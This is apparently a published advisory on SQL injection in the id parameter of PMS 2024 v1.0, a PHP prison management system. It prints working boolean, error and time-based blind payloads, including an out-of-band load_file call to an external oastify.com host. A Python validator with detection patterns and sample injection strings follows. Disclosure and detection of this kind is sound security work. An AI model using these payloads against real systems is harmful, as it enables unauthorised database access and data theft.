PMS 2024 1.0 SQL Injection
PMS 2024 version 1.0 suffers from a remote SQL injection vulnerability.
## Titles: PMS-2024 - PHP (by: oretnom23 ) v1.0 Multiple SQLi
## Author: nu11secur1ty
## Date: 07/06/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The id parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability!

STATUS: HIGH- Vulnerability

[+]Exploits:
- SQLi Multiple:
```mysql
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' RLIKE (SELECT (CASE WHEN (4671=4671) THEN 0x31+(select load_file(0x5c5c5c5c307a30626468326b76746f69777070343933373379317376376d646a3164703473736b6661337a2e6f6173746966792e636f6d5c5c62646b))+'' ELSE 0x28 END)) AND 'apSt'='apSt

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' AND EXTRACTVALUE(4452,CONCAT(0x5c,0x71706b6271,(SELECT (ELT(4452=4452,1))),0x7171706a71)) AND 'SJhj'='SJhj

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' AND (SELECT 6054 FROM (SELECT(SLEEP(7)))kXfT) AND 'mQNi'='mQNi
---
```

## Reproduce:
[href](https://www.patreon.com/posts/pms-php-by-v1-0-107584859)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/07/pms-php-by-oretnom23-v10-multiple-sqli.html)

## Time spent:
01:37:00
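
A defensive check for the `id` POST parameter described above, added here as an example and not taken from the advisory or the PMS code base: it rejects any non-integer `id` and labels which of the reported techniques (out-of-band `load_file`, boolean-based, error-based, time-based) a rejected value resembles. It assumes `id` is a numeric record key; the function name, signature labels and sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Signatures for the behaviours the advisory reports against `id` (labels are hypothetical).
SIGNATURES = {
    # load_file() given a UNC path, either quoted ('\\host\..') or hex-encoded (0x5c5c..)
    "out-of-band (load_file + UNC path)": re.compile(r"load_file\s*\(\s*(?:'\\{2,}|0x5c5c)", re.I),
    "boolean-based blind (RLIKE/CASE)": re.compile(r"\bRLIKE\b.*\bCASE\s+WHEN\b", re.I | re.S),
    "error-based (EXTRACTVALUE)": re.compile(r"\bEXTRACTVALUE\s*\(", re.I),
    "time-based blind (SLEEP)": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
}

def inspect_body(body: str) -> dict:
    """Validate `id` from an urlencoded POST body and label injection attempts."""
    values = parse_qs(body, keep_blank_values=True).get("id", [])
    if len(values) != 1:
        # Absent or duplicated parameters are rejected rather than guessed at.
        return {"valid": False, "id": None, "matches": ["missing or repeated id"]}
    raw = values[0]
    # Assumption: `id` is a numeric record key, so only plain digits are accepted.
    if re.fullmatch(r"[0-9]{1,10}", raw):
        return {"valid": True, "id": int(raw), "matches": []}
    matches = [name for name, rx in SIGNATURES.items() if rx.search(raw)]
    return {"valid": False, "id": None, "matches": matches or ["non-numeric id"]}

# Constructed sample request bodies (shortened stand-ins, not captured traffic).
SAMPLES = [
    "id=1",
    r"id=1'+(select load_file('\\\\oob.example.invalid\\x'))+'",
    "id=1' RLIKE (SELECT (CASE WHEN (1=1) THEN 0x31 ELSE 0x28 END)) AND 'a'='a",
    "id=1' AND EXTRACTVALUE(1,CONCAT(0x5c,(SELECT 1))) AND 'a'='a",
    "id=1' AND (SELECT 1 FROM (SELECT(SLEEP(7)))t) AND 'a'='a",
    "id=1 OR 1",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        result = inspect_body(sample)
        verdict = "accept" if result["valid"] else "reject"
        print(f"{verdict:6} {result['matches']} <- {sample[:60]}")
```

Validation of this kind belongs in front of a parameterized query, not in place of one; the signature labels are for logging and triage only.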